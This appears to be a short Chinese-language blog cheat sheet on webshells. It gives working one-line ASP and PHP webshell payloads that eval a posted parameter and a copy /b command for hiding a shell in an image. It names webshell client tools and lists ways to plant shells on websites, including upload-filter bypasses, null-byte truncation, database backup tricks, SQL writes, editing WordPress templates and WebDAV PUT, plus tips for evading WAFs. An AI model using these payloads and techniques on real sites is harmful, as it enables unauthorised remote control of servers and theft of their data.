Webshell

发布时间 2023-04-05 18:16:41作者: dustfree

含义

php、asp、jsp脚本木马文件,通常位于网站根目录,用来远控站点。

asp:<%eval request("password")%>
aspx:
php:<?php eval($_POST[password])?>
jsp:特定jsp客户端

类型

一句话木马

包含一个函数的php、asp、jsp等脚本文件。     []中是连接密码。

小马

大马

图片马

#图片马工具c32asm或edjpgcom
拖动图片——添加一句话
#cmd制作
copy  /b  1.jpg+1.asp  2.jpg
#图片属性添加
右键详细信息——版权——插入一句话

打包马

脱裤马

客户端

菜刀(文件管理、虚拟终端、数据库管理、网站爬行等功能)

砍刀

蚁剑

冰蝎

Getshell

#拿webshell(已进入后台)
直接上传:上传不带密码的木马
数据库备份:利用cms的备份数据库功能,将上传的jpg木马转化成asp木马。(使用bp进行00截断,以图消解转化后的asp木马后缀asa)
突破本地js验证:审查元素里添加允许上传的文件类型如php、改成jpg后上传,bp抓包修改文件后缀
上传其它脚本类型(只限定一机多站情况):通过数据库备份突破限制、修改后缀为xx.asp.
00截断:上传.jpg文件,抓包修改.jpg文件为.php %00解码(或Hex里20改成00),以注释后边。
网站配置插马:页面插入一句话木马、配置文件(头部或尾部)插入一句话木马            菜刀连接该页面或该配置文件
数据库命令执行:通过执行SQL语句写入一句话木马   前提--网站后台支持执行sql且数据库用户权限够大。
添加静态页面:在cms中添加静态页面模板,结合IIS6.0解析漏洞。
更新404页面:WordPress中编辑404页面
上传插件:插件中捆绑木马
修改网站配置:kevion cms修改上传类型为aaspsp

#拿webshell(未进入后台)
dedecms漏洞利用小工具
IIS写权限漏洞:开启webDAV后可使用PUT和MOVE方法,上传txt然后转换成asp。
命令执行漏洞:执行手工构造的命令(上传一句话木马)
文件上传漏洞:上传图片-bp抓包-改成木马的压缩包
SQL注入漏洞:前提-权限大、文件夹有写入权限、已知网站绝对路径。

过狗过waf

#加密
加密一句话;二次编码以提高绕过率。
#包含
bao.txt写入包含代码,改成bao.asp;1.txt写入一句话,改成1.jpg

#过狗一句话(略)